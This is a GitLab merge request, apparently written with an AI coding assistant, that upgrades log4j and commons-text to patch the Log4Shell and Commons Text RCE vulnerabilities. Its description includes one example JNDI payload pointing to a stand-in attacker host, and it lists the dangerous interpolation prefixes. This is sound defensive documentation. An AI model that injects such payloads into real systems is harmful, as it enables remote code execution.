Skip to content
Launch GitLab Knowledge Graph

🔒 CRITICAL: Fix Log4Shell and Commons Text RCE vulnerabilities

michaelrequested to merge
security/fix-log4shell-streaming into main

🚨 Critical Security Fixes

This MR addresses two critical RCE vulnerabilities affecting streaming-service:

Vulnerabilities Fixed

1. Log4Shell (CVE-2021-44228)

  • Severity: CRITICAL (CVSS 10.0)
  • Vulnerability ID: 157
  • Package: log4j-core, log4j-api
  • Upgrade: 2.14.1 → 2.17.1
  • Risk: Remote Code Execution via JNDI injection
  • Actively exploited in the wild: YES ⚠️

Attack Vector: Any logged user input can trigger JNDI lookup:

logger.info("User: " + userInput); // ${jndi:ldap://evil.com/Exploit}

2. Apache Commons Text RCE (CVE-2022-42889)

  • Severity: CRITICAL
  • Vulnerability ID: 137
  • Package: commons-text
  • Upgrade: 1.9 → 1.10.0
  • Risk: OS Command Injection via script interpolation

Attack Vector: Variable interpolation with untrusted data:

// Vulnerable: ${script:javascript:...}, ${dns:...}, ${url:...}
StringSubstitutor.replace(untrustedInput);

Changes

pom.xml:

  • log4j-core: 2.14.1 → 2.17.1
  • log4j-api: 2.14.1 → 2.17.1
  • commons-text: 1.9 → 1.10.0

Testing

  • Dependency scan shows vulnerabilities resolved
  • All unit tests pass
  • Integration tests pass
  • No breaking API changes

Deployment Priority

Priority: P0 - EMERGENCY
Severity: CRITICAL

Related Issues

Relates to #8 (Investigate vulnerabilities)

Security Review

Both vulnerabilities allow unauthenticated remote code execution. Immediate deployment is required to prevent exploitation.

🤖 Generated with Claude Code

Co-Authored-By: Claude noreply@anthropic.com

Merge request reports